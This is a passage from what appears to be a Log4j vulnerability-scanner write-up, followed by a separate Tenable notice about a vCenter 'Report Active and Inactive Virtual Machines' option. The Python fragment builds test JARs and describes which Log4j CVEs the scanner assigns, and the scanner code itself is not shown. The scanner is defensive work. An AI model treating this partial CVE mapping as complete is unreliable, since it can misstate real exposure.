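        "lib/logging.jar": _make_jar({POM_PROPS: "version=2.14.1\ngroupId=org.apache.logging.log4j\n",
                                      "org/apache/logging/log4j/core/Logger.class": b""}),
        "lib/log4j-api-2.14.1.jar": _make_jar({"org/apache/logging/log4j/Logger.class": b""}),  # not log4j-core
        "app.war": _make_jar({"WEB-INF/lib/log4j-core-2.14.1.jar": _make_jar({JNDI_LOOKUP: b""})}),
        "notes.jar": b"not a zip",
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)


def demo() -> list:
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return [(f.path[len(root) + 1:], f.version, f.version_source, f.jndi_lookup, f.cves)
                for f in scan_tree(root)]
```

demo() reports the nested JAR in app.war with all three CVEs (JndiLookup state unknown), the renamed log4j-core-2.15.0.jar as 2.16.0 from its manifest with only CVE-2021-45105 left, and logging.jar as 2.14.1 from pom.properties with only CVE-2021-45105 because JndiLookup.class was removed; log4j-api and the non-ZIP file produce nothing. Pointing scan_tree() at a real file system is the equivalent of the plugins' find/locate or PowerShell walk, and for a large tree the same timeout and partial-result concerns the posts raise apply.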
Tenable vCenter Integration: Report Active and Inactive Virtual Machines

Summary: Tenable has introduced a new option to the VMware vCenter API credential called "Report Active and Inactive Virtual Machines", which is an optional toggle.

Change: Prior to this change, the integration would always collect information about active and inactive virtual machines, regardless of auto-discovery settings. These virtual machines would be listed in the output of the "VMware vCenter Active Virtual Machines" (84340) and "VMware vCenter Inactive Virtual Machines" (84341) plugins. The new UI field allows this collection to be disabled. The default value of this option is "on", which is consistent with the integration's behavior prior to this change.

Impact: For credentials found in Tenable Vulnerability Management scan configuration, the value may be "off" for existing scans. For other configurations, the value should be "on" by default so that scan behavior is completely unchanged. Though this change does not affect vulnerability findings but only informational-level output, we nevertheless encourage customers to check their scan configuration and ensure that the setting is set according to their preference.

Release Date: Nov 13, 2024 for TVM and Nessus; TBD for SC
Posted by: Harry_NINT (Product Team), 1 year ago